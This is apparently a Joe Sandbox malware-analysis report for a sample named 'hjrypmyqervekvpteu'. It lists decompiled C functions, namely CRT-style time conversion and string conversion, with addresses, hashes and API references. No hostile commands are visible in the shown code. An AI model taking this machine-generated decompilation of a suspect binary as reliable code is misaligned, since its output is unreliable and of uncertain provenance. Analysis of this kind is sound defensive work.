                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      • Opcode ID: 28aa61b0d07f4b90e27b46d9792d02dc35131dcc48bc5c39be0fe45478580fc2
                                                                                                                                      • Instruction ID: 7e7963c6d1b59d0dd98e51fccbcb1fbef74721a8e5a08def82de36e8ef083dea
                                                                                                                                      • Opcode Fuzzy Hash: 28aa61b0d07f4b90e27b46d9792d02dc35131dcc48bc5c39be0fe45478580fc2
                                                                                                                                      • Instruction Fuzzy Hash: 0F11B131902B85EAE924BBB4CC09FCBB79D6F5070DF408C14B29EA7054DB34B8008754
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 69%
                                                                                                                                      			E01312199(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                                                                                                                                      				intOrPtr _v0;
                                                                                                                                      				char _v8;
                                                                                                                                      				signed int _v12;
                                                                                                                                      				char _v16;
                                                                                                                                      				signed int _v20;
                                                                                                                                      				char _v24;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				signed int _t61;
                                                                                                                                      				void* _t64;
                                                                                                                                      				signed int _t67;
                                                                                                                                      				signed int _t69;
                                                                                                                                      				signed int _t70;
                                                                                                                                      				signed int _t73;
                                                                                                                                      				signed int _t75;
                                                                                                                                      				signed int _t77;
                                                                                                                                      				signed int _t78;
                                                                                                                                      				intOrPtr _t80;
                                                                                                                                      				signed int _t81;
                                                                                                                                      				void* _t82;
                                                                                                                                      				signed int _t84;
                                                                                                                                      				void* _t85;
                                                                                                                                      				signed int _t87;
                                                                                                                                      				signed int _t93;
                                                                                                                                      				signed int _t102;
                                                                                                                                      				void* _t104;
                                                                                                                                      				signed int _t107;
                                                                                                                                      				signed int* _t110;
                                                                                                                                      				signed int* _t111;
                                                                                                                                      				intOrPtr* _t113;
                                                                                                                                      				signed int _t118;
                                                                                                                                      				signed int _t120;
                                                                                                                                      				signed int _t123;
                                                                                                                                      				void* _t125;
                                                                                                                                      				signed int _t128;
                                                                                                                                      				signed int _t131;
                                                                                                                                      				signed int _t139;
                                                                                                                                      				signed int _t145;
                                                                                                                                      				void _t147;
                                                                                                                                      				void* _t148;
                                                                                                                                      				void* _t150;
                                                                                                                                      				void* _t152;
                                                                                                                                      				signed int _t153;
                                                                                                                                      				signed int _t154;
                                                                                                                                      				void* _t155;
                                                                                                                                      				signed int _t156;
                                                                                                                                      				signed int _t157;
                                                                                                                                      				signed int _t158;
                                                                                                                                      				intOrPtr _t159;
                                                                                                                                      
                                                                                                                                      				_t139 = __edx;
                                                                                                                                      				_t155 = _a4;
                                                                                                                                      				if(_t155 == 0) {
                                                                                                                                      					_t113 = E01313CD1();
                                                                                                                                      					_t159 = 0x16;
                                                                                                                                      					 *_t113 = _t159;
                                                                                                                                      					E013110B9();
                                                                                                                                      					return _t159;
                                                                                                                                      				}
                                                                                                                                      				_push(__edi);
                                                                                                                                      				_t123 = 9;
                                                                                                                                      				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
                                                                                                                                      				_t145 = _a8;
                                                                                                                                      				__eflags = _t145;
                                                                                                                                      				if(_t145 == 0) {
                                                                                                                                      					_t111 = E01313CD1();
                                                                                                                                      					_t158 = 0x16;
                                                                                                                                      					 *_t111 = _t158;
                                                                                                                                      					E013110B9();
                                                                                                                                      					_t78 = _t158;
                                                                                                                                      					L12:
                                                                                                                                      					return _t78;
                                                                                                                                      				}
                                                                                                                                      				_push(__ebx);
                                                                                                                                      				__eflags =  *(_t145 + 4);
                                                                                                                                      				if(__eflags <= 0) {
                                                                                                                                      					if(__eflags < 0) {
                                                                                                                                      						L10:
                                                                                                                                      						_t110 = E01313CD1();
                                                                                                                                      						_t157 = 0x16;
                                                                                                                                      						 *_t110 = _t157;
                                                                                                                                      						_t78 = _t157;
                                                                                                                                      						L11:
                                                                                                                                      						goto L12;
                                                                                                                                      					}
                                                                                                                                      					__eflags =  *_t145;
                                                                                                                                      					if( *_t145 < 0) {
                                                                                                                                      						goto L10;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t64 = 7;
                                                                                                                                      				__eflags =  *(_t145 + 4) - _t64;
                                                                                                                                      				if(__eflags >= 0) {
                                                                                                                                      					if(__eflags > 0) {
                                                                                                                                      						goto L10;
                                                                                                                                      					}
                                                                                                                                      					__eflags =  *_t145 - 0x93406fff;
                                                                                                                                      					if( *_t145 > 0x93406fff) {
                                                                                                                                      						goto L10;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				E01318B63(0, _t145, _t155);
                                                                                                                                      				_v12 = 0;
                                                                                                                                      				_v16 = 0;
                                                                                                                                      				_v8 = 0;
                                                                                                                                      				_t67 = E01318124( &_v12);
                                                                                                                                      				_pop(_t125);
                                                                                                                                      				__eflags = _t67;
                                                                                                                                      				if(_t67 == 0) {
                                                                                                                                      					_t75 = E01318150( &_v16);
                                                                                                                                      					_pop(_t125);
                                                                                                                                      					__eflags = _t75;
                                                                                                                                      					if(_t75 == 0) {
                                                                                                                                      						_t77 = E0131817C( &_v8);
                                                                                                                                      						_pop(_t125);
                                                                                                                                      						__eflags = _t77;
                                                                                                                                      						if(_t77 == 0) {
                                                                                                                                      							_t118 =  *(_t145 + 4);
                                                                                                                                      							_t128 =  *_t145;
                                                                                                                                      							__eflags = _t118;
                                                                                                                                      							if(__eflags < 0) {
                                                                                                                                      								L28:
                                                                                                                                      								_push(_t145);
                                                                                                                                      								_push(_t155);
                                                                                                                                      								_t78 = E01318411();
                                                                                                                                      								__eflags = _t78;
                                                                                                                                      								if(_t78 != 0) {
                                                                                                                                      									goto L11;
                                                                                                                                      								}
                                                                                                                                      								__eflags = _v12;
                                                                                                                                      								asm("cdq");
                                                                                                                                      								_t147 =  *_t155;
                                                                                                                                      								_t120 = _t139;
                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                      									L32:
                                                                                                                                      									_t80 = _v8;
                                                                                                                                      									L33:
                                                                                                                                      									asm("cdq");
                                                                                                                                      									_t148 = _t147 - _t80;
                                                                                                                                      									asm("sbb ebx, edx");
                                                                                                                                      									_t81 = E01322BC0(_t148, _t120, 0x3c, 0);
                                                                                                                                      									 *_t155 = _t81;
                                                                                                                                      									__eflags = _t81;
                                                                                                                                      									if(_t81 < 0) {
                                                                                                                                      										_t148 = _t148 + 0xffffffc4;
                                                                                                                                      										 *_t155 = _t81 + 0x3c;
                                                                                                                                      										asm("adc ebx, 0xffffffff");
                                                                                                                                      									}
                                                                                                                                      									_t82 = E01322B10(_t148, _t120, 0x3c, 0);
                                                                                                                                      									_t121 = _t139;
                                                                                                                                      									_t28 = _t155 + 4; // 0x458d0132
                                                                                                                                      									asm("cdq");
                                                                                                                                      									_t150 = _t82 +  *_t28;
                                                                                                                                      									asm("adc ebx, edx");
                                                                                                                                      									_t84 = E01322BC0(_t150, _t139, 0x3c, 0);
                                                                                                                                      									 *(_t155 + 4) = _t84;
                                                                                                                                      									__eflags = _t84;
                                                                                                                                      									if(_t84 < 0) {
                                                                                                                                      										_t150 = _t150 + 0xffffffc4;
                                                                                                                                      										 *(_t155 + 4) = _t84 + 0x3c;
                                                                                                                                      										asm("adc ebx, 0xffffffff");
                                                                                                                                      									}
                                                                                                                                      									_t85 = E01322B10(_t150, _t121, 0x3c, 0);
                                                                                                                                      									_t122 = _t139;
                                                                                                                                      									_t31 = _t155 + 8; // 0x50506aa8
                                                                                                                                      									asm("cdq");
                                                                                                                                      									_t152 = _t85 +  *_t31;
                                                                                                                                      									asm("adc ebx, edx");
                                                                                                                                      									_t87 = E01322BC0(_t152, _t139, 0x18, 0);
                                                                                                                                      									 *(_t155 + 8) = _t87;
                                                                                                                                      									__eflags = _t87;
                                                                                                                                      									if(_t87 < 0) {
                                                                                                                                      										_t152 = _t152 + 0xffffffe8;
                                                                                                                                      										 *(_t155 + 8) = _t87 + 0x18;
                                                                                                                                      										asm("adc ebx, 0xffffffff");
                                                                                                                                      									}
                                                                                                                                      									_t131 = E01322B10(_t152, _t122, 0x18, 0);
                                                                                                                                      									__eflags = _t139;
                                                                                                                                      									if(__eflags < 0) {
                                                                                                                                      										L48:
                                                                                                                                      										_t44 = _t155 + 0x18; // 0xeae850ce
                                                                                                                                      										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
                                                                                                                                      										asm("cdq");
                                                                                                                                      										_t153 = 7;
                                                                                                                                      										_t51 = _t155 + 0xc; // 0xa747e8
                                                                                                                                      										_t93 =  *_t51;
                                                                                                                                      										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
                                                                                                                                      										__eflags = _t93;
                                                                                                                                      										if(_t93 > 0) {
                                                                                                                                      											goto L43;
                                                                                                                                      										}
                                                                                                                                      										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
                                                                                                                                      										 *(_t155 + 0xc) = _t93 + 0x1f;
                                                                                                                                      										_t55 = _t131 + 0x16d; // 0x16d
                                                                                                                                      										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
                                                                                                                                      										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
                                                                                                                                      										goto L44;
                                                                                                                                      									} else {
                                                                                                                                      										if(__eflags > 0) {
                                                                                                                                      											L42:
                                                                                                                                      											_t34 = _t155 + 0x18; // 0xeae850ce
                                                                                                                                      											asm("cdq");
                                                                                                                                      											_t154 = 7;
                                                                                                                                      											_t39 = _t155 + 0xc;
                                                                                                                                      											 *_t39 =  *(_t155 + 0xc) + _t131;
                                                                                                                                      											__eflags =  *_t39;
                                                                                                                                      											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
                                                                                                                                      											L43:
                                                                                                                                      											_t42 = _t155 + 0x1c;
                                                                                                                                      											 *_t42 =  *(_t155 + 0x1c) + _t131;
                                                                                                                                      											__eflags =  *_t42;
                                                                                                                                      											L44:
                                                                                                                                      											_t78 = 0;
                                                                                                                                      											goto L11;
                                                                                                                                      										}
                                                                                                                                      										__eflags = _t131;
                                                                                                                                      										if(_t131 == 0) {
                                                                                                                                      											__eflags = _t139;
                                                                                                                                      											if(__eflags > 0) {
                                                                                                                                      												goto L44;
                                                                                                                                      											}
                                                                                                                                      											if(__eflags < 0) {
                                                                                                                                      												goto L48;
                                                                                                                                      											}
                                                                                                                                      											__eflags = _t131;
                                                                                                                                      											if(_t131 >= 0) {
                                                                                                                                      												goto L44;
                                                                                                                                      											}
                                                                                                                                      											goto L48;
                                                                                                                                      										}
                                                                                                                                      										goto L42;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								_push(_t155);
                                                                                                                                      								_t102 = E01318BB4(_t120, _t147, _t155, __eflags);
                                                                                                                                      								__eflags = _t102;
                                                                                                                                      								if(_t102 == 0) {
                                                                                                                                      									goto L32;
                                                                                                                                      								}
                                                                                                                                      								_t80 = _v8 + _v16;
                                                                                                                                      								 *((intOrPtr*)(_t155 + 0x20)) = 1;
                                                                                                                                      								goto L33;
                                                                                                                                      							}
                                                                                                                                      							if(__eflags > 0) {
                                                                                                                                      								L20:
                                                                                                                                      								_t104 = 7;
                                                                                                                                      								__eflags = _t118 - _t104;
                                                                                                                                      								if(__eflags > 0) {
                                                                                                                                      									goto L28;
                                                                                                                                      								}
                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                      									L23:
                                                                                                                                      									asm("cdq");
                                                                                                                                      									_push( &_v24);
                                                                                                                                      									asm("sbb ebx, edx");
                                                                                                                                      									_v24 = _t128 - _v8;
                                                                                                                                      									_push(_t155);
                                                                                                                                      									_v20 = _t118;
                                                                                                                                      									_t78 = E01318411();
                                                                                                                                      									__eflags = _t78;
                                                                                                                                      									if(_t78 != 0) {
                                                                                                                                      										goto L11;
                                                                                                                                      									}
                                                                                                                                      									__eflags = _v12 - _t78;
                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                      										goto L44;
                                                                                                                                      									}
                                                                                                                                      									_push(_t155);
                                                                                                                                      									_t107 = E01318BB4(_t118, _t145, _t155, __eflags);
                                                                                                                                      									__eflags = _t107;
                                                                                                                                      									if(_t107 == 0) {
                                                                                                                                      										goto L44;
                                                                                                                                      									}
                                                                                                                                      									asm("cdq");
                                                                                                                                      									_v24 = _v24 - _v16;
                                                                                                                                      									_push( &_v24);
                                                                                                                                      									asm("sbb [ebp-0x10], edx");
                                                                                                                                      									_push(_t155);
                                                                                                                                      									_t78 = E01318411();
                                                                                                                                      									__eflags = _t78;
                                                                                                                                      									if(_t78 != 0) {
                                                                                                                                      										goto L11;
                                                                                                                                      									}
                                                                                                                                      									 *((intOrPtr*)(_t155 + 0x20)) = 1;
                                                                                                                                      									goto L44;
                                                                                                                                      								}
                                                                                                                                      								__eflags = _t128 - 0x933c7b7f;
                                                                                                                                      								if(_t128 >= 0x933c7b7f) {
                                                                                                                                      									goto L28;
                                                                                                                                      								}
                                                                                                                                      								goto L23;
                                                                                                                                      							}
                                                                                                                                      							__eflags = _t128 - 0x3f480;
                                                                                                                                      							if(_t128 <= 0x3f480) {
                                                                                                                                      								goto L28;
                                                                                                                                      							}
                                                                                                                                      							goto L20;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_push(0);
                                                                                                                                      				_push(0);
                                                                                                                                      				_push(0);
                                                                                                                                      				_push(0);
                                                                                                                                      				_push(0);
                                                                                                                                      				E013110E6();
                                                                                                                                      				asm("int3");
                                                                                                                                      				_push(_t155);
                                                                                                                                      				_t69 = E013183D3(_t125);
                                                                                                                                      				_t156 = _t69;
                                                                                                                                      				__eflags = _t156;
                                                                                                                                      				if(_t156 != 0) {
                                                                                                                                      					_push(_v0);
                                                                                                                                      					_t70 = E01312199(0, _t139, _t145, _t156);
                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                      					_t73 =  !( ~_t70) & _t156;
                                                                                                                                      					__eflags = _t73;
                                                                                                                                      					return _t73;
                                                                                                                                      				}
                                                                                                                                      				return _t69;
                                                                                                                                      			}




















































                                                                                                                                      0x01312199
                                                                                                                                      0x013121a2
                                                                                                                                      0x013121a7
                                                                                                                                      0x013121a9
                                                                                                                                      0x013121b0
                                                                                                                                      0x013121b1
                                                                                                                                      0x013121b3
                                                                                                                                      0x00000000
                                                                                                                                      0x013121b8
                                                                                                                                      0x013121bc
                                                                                                                                      0x013121c4
                                                                                                                                      0x013121c5
                                                                                                                                      0x013121c7
                                                                                                                                      0x013121ca
                                                                                                                                      0x013121cc
                                                                                                                                      0x013121ce
                                                                                                                                      0x013121d5
                                                                                                                                      0x013121d6
                                                                                                                                      0x013121d8
                                                                                                                                      0x013121dd
                                                                                                                                      0x0131220e
                                                                                                                                      0x00000000
                                                                                                                                      0x0131220e
                                                                                                                                      0x013121e1
                                                                                                                                      0x013121e4
                                                                                                                                      0x013121e7
                                                                                                                                      0x013121e9
                                                                                                                                      0x01312201
                                                                                                                                      0x01312201
                                                                                                                                      0x01312208
                                                                                                                                      0x01312209
                                                                                                                                      0x0131220b
                                                                                                                                      0x0131220d
                                                                                                                                      0x00000000
                                                                                                                                      0x0131220d
                                                                                                                                      0x013121eb
                                                                                                                                      0x013121ed
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013121ed
                                                                                                                                      0x013121f1
                                                                                                                                      0x013121f2
                                                                                                                                      0x013121f5
                                                                                                                                      0x013121f7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013121f9
                                                                                                                                      0x013121ff
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013121ff
                                                                                                                                      0x01312214
                                                                                                                                      0x0131221c
                                                                                                                                      0x01312220
                                                                                                                                      0x01312223
                                                                                                                                      0x01312226
                                                                                                                                      0x0131222b
                                                                                                                                      0x0131222c
                                                                                                                                      0x0131222e
                                                                                                                                      0x01312238
                                                                                                                                      0x0131223d
                                                                                                                                      0x0131223e
                                                                                                                                      0x01312240
                                                                                                                                      0x0131224a
                                                                                                                                      0x0131224f
                                                                                                                                      0x01312250
                                                                                                                                      0x01312252
                                                                                                                                      0x01312258
                                                                                                                                      0x0131225b
                                                                                                                                      0x0131225d
                                                                                                                                      0x0131225f
                                                                                                                                      0x013122e0
                                                                                                                                      0x013122e0
                                                                                                                                      0x013122e1
                                                                                                                                      0x013122e2
                                                                                                                                      0x013122e9
                                                                                                                                      0x013122eb
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013122f1
                                                                                                                                      0x013122f7
                                                                                                                                      0x013122f8
                                                                                                                                      0x013122fa
                                                                                                                                      0x013122fc
                                                                                                                                      0x01312318
                                                                                                                                      0x01312318
                                                                                                                                      0x0131231b
                                                                                                                                      0x0131231b
                                                                                                                                      0x0131231c
                                                                                                                                      0x01312322
                                                                                                                                      0x01312326
                                                                                                                                      0x0131232b
                                                                                                                                      0x0131232d
                                                                                                                                      0x0131232f
                                                                                                                                      0x01312334
                                                                                                                                      0x01312337
                                                                                                                                      0x01312339
                                                                                                                                      0x01312339
                                                                                                                                      0x01312342
                                                                                                                                      0x01312349
                                                                                                                                      0x0131234b
                                                                                                                                      0x0131234e
                                                                                                                                      0x0131234f
                                                                                                                                      0x01312355
                                                                                                                                      0x01312359
                                                                                                                                      0x0131235e
                                                                                                                                      0x01312361
                                                                                                                                      0x01312363
                                                                                                                                      0x01312368
                                                                                                                                      0x0131236b
                                                                                                                                      0x0131236e
                                                                                                                                      0x0131236e
                                                                                                                                      0x01312377
                                                                                                                                      0x0131237e
                                                                                                                                      0x01312380
                                                                                                                                      0x01312383
                                                                                                                                      0x01312384
                                                                                                                                      0x0131238a
                                                                                                                                      0x0131238e
                                                                                                                                      0x01312393
                                                                                                                                      0x01312396
                                                                                                                                      0x01312398
                                                                                                                                      0x0131239d
                                                                                                                                      0x013123a0
                                                                                                                                      0x013123a3
                                                                                                                                      0x013123a3
                                                                                                                                      0x013123b1
                                                                                                                                      0x013123b3
                                                                                                                                      0x013123b5
                                                                                                                                      0x013123e2
                                                                                                                                      0x013123e2
                                                                                                                                      0x013123e8
                                                                                                                                      0x013123ef
                                                                                                                                      0x013123f0
                                                                                                                                      0x013123f3
                                                                                                                                      0x013123f3
                                                                                                                                      0x013123f6
                                                                                                                                      0x013123f9
                                                                                                                                      0x013123fb
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01312400
                                                                                                                                      0x01312407
                                                                                                                                      0x0131240a
                                                                                                                                      0x01312410
                                                                                                                                      0x01312413
                                                                                                                                      0x00000000
                                                                                                                                      0x013123b7
                                                                                                                                      0x013123b7
                                                                                                                                      0x013123bd
                                                                                                                                      0x013123bd
                                                                                                                                      0x013123c4
                                                                                                                                      0x013123c5
                                                                                                                                      0x013123c8
                                                                                                                                      0x013123c8
                                                                                                                                      0x013123c8
                                                                                                                                      0x013123cb
                                                                                                                                      0x013123ce
                                                                                                                                      0x013123ce
                                                                                                                                      0x013123ce
                                                                                                                                      0x013123ce
                                                                                                                                      0x013123d1
                                                                                                                                      0x013123d1
                                                                                                                                      0x00000000
                                                                                                                                      0x013123d1
                                                                                                                                      0x013123b9
                                                                                                                                      0x013123bb
                                                                                                                                      0x013123d8
                                                                                                                                      0x013123da
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013123dc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013123de
                                                                                                                                      0x013123e0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013123e0
                                                                                                                                      0x00000000
                                                                                                                                      0x013123bb
                                                                                                                                      0x013123b5
                                                                                                                                      0x013122fe
                                                                                                                                      0x013122ff
                                                                                                                                      0x01312305
                                                                                                                                      0x01312307
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131230c
                                                                                                                                      0x0131230f
                                                                                                                                      0x00000000
                                                                                                                                      0x0131230f
                                                                                                                                      0x01312261
                                                                                                                                      0x0131226b
                                                                                                                                      0x0131226d
                                                                                                                                      0x0131226e
                                                                                                                                      0x01312270
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01312272
                                                                                                                                      0x0131227c
                                                                                                                                      0x0131227f
                                                                                                                                      0x01312285
                                                                                                                                      0x01312286
                                                                                                                                      0x01312288
                                                                                                                                      0x0131228b
                                                                                                                                      0x0131228c
                                                                                                                                      0x0131228f
                                                                                                                                      0x01312296
                                                                                                                                      0x01312298
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131229e
                                                                                                                                      0x013122a1
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013122a7
                                                                                                                                      0x013122a8
                                                                                                                                      0x013122ae
                                                                                                                                      0x013122b0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013122b9
                                                                                                                                      0x013122ba
                                                                                                                                      0x013122c0
                                                                                                                                      0x013122c1
                                                                                                                                      0x013122c4
                                                                                                                                      0x013122c5
                                                                                                                                      0x013122cc
                                                                                                                                      0x013122ce
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013122d4
                                                                                                                                      0x00000000
                                                                                                                                      0x013122d4
                                                                                                                                      0x01312274
                                                                                                                                      0x0131227a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131227a
                                                                                                                                      0x01312263
                                                                                                                                      0x01312269
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01312269
                                                                                                                                      0x01312252
                                                                                                                                      0x01312240
                                                                                                                                      0x01312418
                                                                                                                                      0x01312419
                                                                                                                                      0x0131241a
                                                                                                                                      0x0131241b
                                                                                                                                      0x0131241c
                                                                                                                                      0x0131241d
                                                                                                                                      0x01312422
                                                                                                                                      0x01312428
                                                                                                                                      0x01312429
                                                                                                                                      0x0131242e
                                                                                                                                      0x01312430
                                                                                                                                      0x01312432
                                                                                                                                      0x01312434
                                                                                                                                      0x01312438
                                                                                                                                      0x01312440
                                                                                                                                      0x01312445
                                                                                                                                      0x01312445
                                                                                                                                      0x00000000
                                                                                                                                      0x01312445
                                                                                                                                      0x01312449

                                                                                                                                      APIs
                                                                                                                                      • __allrem.LIBCMT ref: 01312326
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01312342
                                                                                                                                      • __allrem.LIBCMT ref: 01312359
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01312377
                                                                                                                                      • __allrem.LIBCMT ref: 0131238E
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013123AC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                      • Opcode ID: 359f923ff82628f50d0da979ec84e992891754370f9de0c76e98626cba923636
                                                                                                                                      • Instruction ID: 0fdcaa3a1f7326da036a8aa04120be4f153de54de9b5cd5936715c1cf74b0db0
                                                                                                                                      • Opcode Fuzzy Hash: 359f923ff82628f50d0da979ec84e992891754370f9de0c76e98626cba923636
                                                                                                                                      • Instruction Fuzzy Hash: C681F972A007069BE72DAE6DCC80BAF73A8EF5172CF34453AE511E7684EB70D9418794
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 69%
                                                                                                                                      			E01313E15(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				int _v12;
                                                                                                                                      				void* _v24;
                                                                                                                                      				signed int _t49;
                                                                                                                                      				signed int _t54;
                                                                                                                                      				int _t58;
                                                                                                                                      				signed int _t60;
                                                                                                                                      				short* _t62;
                                                                                                                                      				signed int _t66;
                                                                                                                                      				short* _t70;
                                                                                                                                      				int _t71;
                                                                                                                                      				int _t78;
                                                                                                                                      				short* _t81;
                                                                                                                                      				signed int _t87;
                                                                                                                                      				signed int _t90;
                                                                                                                                      				void* _t95;
                                                                                                                                      				void* _t96;
                                                                                                                                      				int _t98;
                                                                                                                                      				short* _t101;
                                                                                                                                      				int _t103;
                                                                                                                                      				signed int _t106;
                                                                                                                                      				short* _t107;
                                                                                                                                      				void* _t110;
                                                                                                                                      
                                                                                                                                      				_push(__ecx);
                                                                                                                                      				_push(__ecx);
                                                                                                                                      				_t49 =  *0x132e00c; // 0x17120af4
                                                                                                                                      				_v8 = _t49 ^ _t106;
                                                                                                                                      				_push(__esi);
                                                                                                                                      				_t103 = _a20;
                                                                                                                                      				if(_t103 > 0) {
                                                                                                                                      					_t78 = E0131B654(_a16, _t103);
                                                                                                                                      					_t110 = _t78 - _t103;
                                                                                                                                      					_t4 = _t78 + 1; // 0x1
                                                                                                                                      					_t103 = _t4;
                                                                                                                                      					if(_t110 >= 0) {
                                                                                                                                      						_t103 = _t78;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t98 = _a32;
                                                                                                                                      				if(_t98 == 0) {
                                                                                                                                      					_t98 =  *( *_a4 + 8);
                                                                                                                                      					_a32 = _t98;
                                                                                                                                      				}
                                                                                                                                      				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                                                                                      				_v12 = _t54;
                                                                                                                                      				if(_t54 == 0) {
                                                                                                                                      					L38:
                                                                                                                                      					return E0130A07B(_v8 ^ _t106);
                                                                                                                                      				} else {
                                                                                                                                      					_t95 = _t54 + _t54;
                                                                                                                                      					_t85 = _t95 + 8;
                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                      					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                                                                                      						_t81 = 0;
                                                                                                                                      						__eflags = 0;
                                                                                                                                      						L14:
                                                                                                                                      						if(_t81 == 0) {
                                                                                                                                      							L36:
                                                                                                                                      							_t105 = 0;
                                                                                                                                      							L37:
                                                                                                                                      							E0131407D(_t81);
                                                                                                                                      							goto L38;
                                                                                                                                      						}
                                                                                                                                      						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                                                                                      						_t121 = _t58;
                                                                                                                                      						if(_t58 == 0) {
                                                                                                                                      							goto L36;
                                                                                                                                      						}
                                                                                                                                      						_t100 = _v12;
                                                                                                                                      						_t60 = E01314B47(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                                                                                                      						_t105 = _t60;
                                                                                                                                      						if(_t105 == 0) {
                                                                                                                                      							goto L36;
                                                                                                                                      						}
                                                                                                                                      						if((_a12 & 0x00000400) == 0) {
                                                                                                                                      							_t96 = _t105 + _t105;
                                                                                                                                      							_t87 = _t96 + 8;
                                                                                                                                      							__eflags = _t96 - _t87;
                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                      							__eflags = _t87 & _t60;
                                                                                                                                      							if((_t87 & _t60) == 0) {
                                                                                                                                      								_t101 = 0;
                                                                                                                                      								__eflags = 0;
                                                                                                                                      								L30:
                                                                                                                                      								__eflags = _t101;
                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                      									L35:
                                                                                                                                      									E0131407D(_t101);
                                                                                                                                      									goto L36;
                                                                                                                                      								}
                                                                                                                                      								_t62 = E01314B47(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                                                                                      								__eflags = _t62;
                                                                                                                                      								if(_t62 == 0) {
                                                                                                                                      									goto L35;
                                                                                                                                      								}
                                                                                                                                      								_push(0);
                                                                                                                                      								_push(0);
                                                                                                                                      								__eflags = _a28;
                                                                                                                                      								if(_a28 != 0) {
                                                                                                                                      									_push(_a28);
                                                                                                                                      									_push(_a24);
                                                                                                                                      								} else {
                                                                                                                                      									_push(0);
                                                                                                                                      									_push(0);
                                                                                                                                      								}
                                                                                                                                      								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                                                                                      								__eflags = _t105;
                                                                                                                                      								if(_t105 != 0) {
                                                                                                                                      									E0131407D(_t101);
                                                                                                                                      									goto L37;
                                                                                                                                      								} else {
                                                                                                                                      									goto L35;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							_t90 = _t96 + 8;
